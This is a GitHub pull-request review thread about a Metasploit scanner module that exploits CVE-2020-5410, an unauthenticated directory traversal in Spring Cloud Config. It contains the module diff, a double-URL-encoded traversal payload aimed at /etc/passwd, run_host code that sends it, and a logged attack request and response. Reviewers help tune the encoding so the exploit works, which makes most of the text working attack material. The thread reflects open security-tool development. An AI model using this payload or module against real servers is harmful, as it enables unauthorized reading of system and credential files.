modules/auxiliary/scanner/http/springcloud_traversal2.rb

```diff
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Spring Cloud Config Server Directory Traversal',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability
+        which exists in Spring Cloud Config versions 2.2.x prior to 2.2.3 and
+        2.1.x prior to 2.1.9, and older unsupported versions. Spring
+        Cloud Config listens by default on port 8888.
+      },
+      'References'  =>
+        [
+          ['CVE', '2020-5410'],
+          ['URL', 'https://tanzu.vmware.com/security/cve-2020-5410']
+        ],
+      'Author'      =>
+        [
+          'Fei Lu', # Vulnerability discovery
+          'bfpiaoran@qq.com', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => '2020-06-01',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8888),
+        OptString.new('FILEPATH', [true, "The path to the file to read", 'etc%252Fpasswd']),
```

Comment:
If the path needs special encoding, then that should be taken care of in the module. The user shouldn't have to manually encode the data themselves.

```suggestion
        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
```

Reply:
Thanks you @bcoles so the exploitation requires `"127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"` `FILEPATH`to be encoded so that's the reason, I've set it in that way. 

I am not familiar with any other approach here if `FILEPATH` requires encoding.

Reply:
> I am not familiar with any other approach here if FILEPATH requires encoding.

`%252F` is double URL encoding of `/`.

Fortunately, there are libraries to perform URL encoding.

The Rex libraries feature URL encoding methods, such as:

```ruby
Rex::Text.uri_encode(data)
Rex::Text.uri_encode(data, 'hex-normal')
Rex::Text.uri_encode(data, 'hex-noslashes')
Rex::Text.uri_encode(data, 'hex-all')
```

You will be able to perform the appropriate encoding using a variation of these. You may simply be able to double URL encode the entire request:

```
irb(main):001:0> require 'rex/text'
=> true
irb(main):002:0> Rex::Text.uri_encode('/', 'hex-all')
=> "%2f"
irb(main):003:0> Rex::Text.uri_encode(Rex::Text.uri_encode('/', 'hex-all'))
=> "%252f"
irb(main):004:0> path = '/etc/passwd'
irb(main):005:0> Rex::Text.uri_encode(Rex::Text.uri_encode(path, 'hex-all'))
=> "%252f%2565%2574%2563%252f%2570%2561%2573%2573%2577%2564"
irb(main):006:0> 
```

Reply:
So, I tried below but still `FILEPATH` is not encoded, can you suggest what is missing here.
```
  def run_host(ip)
    filename = datastore['FILEPATH']
    traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
    uri = "/#{traversal}%23foo/development"

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => uri,
      'vars_get' =>
        {
          'zero' => Rex::Text.uri_encode(Rex::Text.uri_encode(filename + uri, 'hex-all'))
        }
    })
```

Reply:
> can you suggest what is missing here

For starters, you've touched other things, like now using `vars_get` with a `zero` parameter, and now requesting `filename + uri` which is going to include `filename` twice.

Your goal is to double URL encode the file system path.

The code in your PR does this:

```ruby
    traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
    uri = "/#{traversal}%23foo/development"

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => uri
    })
```

If you're lucky, the server is double URL decoding the entire file system path, so something like this should work, 

```ruby
    filename = '/etc/passwd'
    traversal = Rex::Text.uri_encode(Rex::Text.uri_encode("#{"../" * datastore['DEPTH']}#{filename}", 'hex-all'))
    uri = "/#{traversal}%23foo/development"

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => uri
    })
```

Reply:
So, it double encodes the path but couldn't fetch `/etc/passwd`.
```ruby
msf5 auxiliary(scanner/http/springcloud_traversal2) > run

####################
# Request:
####################
GET /%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252f%2565%2574%2563%252f%2570%2561%2573%2573%2577%2564%23foo/development HTTP/1.1
Host: 192.168.1.1:8888
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)


####################
# Response:
####################
HTTP/1.1 200
Content-Type: application/json
Transfer-Encoding: chunked
Date: Sat, 20 Jun 2020 13:49:25 GMT

{"name":"%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2f%65%74%63%2f%70%61%73%73%77%64#foo","profiles":["development"],"label":null,"version":"bb51f4173258ae3481c61b95b503c13862ccfba7","state":null,"propertySources":[{"name":"https://github.com/spring-cloud-samples/config-repo/application.yml (document #0)","source":{"info.description":"Spring Cloud Samples","info.url":"https://github.com/spring-cloud-samples","eureka.client.serviceUrl.defaultZone":"http://localhost:8761/eureka/","foo":"baz"}}]}
[+] 192.168.1.1:8888 - {"name":"%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2f%65%74%63%2f%70%61%73%73%77%64#foo","profiles":["development"],"label":null,"version":"bb51f4173258ae3481c61b95b503c13862ccfba7","state":null,"propertySources":[{"name":"https://github.com/spring-cloud-samples/config-repo/application.yml (document #0)","source":{"info.description":"Spring Cloud Samples","info.url":"https://github.com/spring-cloud-samples","eureka.client.serviceUrl.defaultZone":"http://localhost:8761/eureka/","foo":"baz"}}]}
[+] File saved in: /Users/Dhiraj/.msf4/loot/20200620174925_default_192.168.1.1_springcloud.trav_670936.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Reply:
I had a similar issue where it was double encoding and not working.  Switching `cgi` to `raw` and doing the encoding myself worked in my case, maybe it'll help.
https://github.com/rapid7/metasploit-framework/pull/13741/files#diff-d51a9b7824d1989dfd0da0ca7adabf3fR137-R141

Reply:
> I had a similar issue where it was double encoding and not working. Switching `cgi` to `raw` and doing the encoding myself worked in my case, maybe it'll help.
> https://github.com/rapid7/metasploit-framework/pull/13741/files#diff-d51a9b7824d1989dfd0da0ca7adabf3fR137-R141

Thank you @h00die, I'll give a try on this.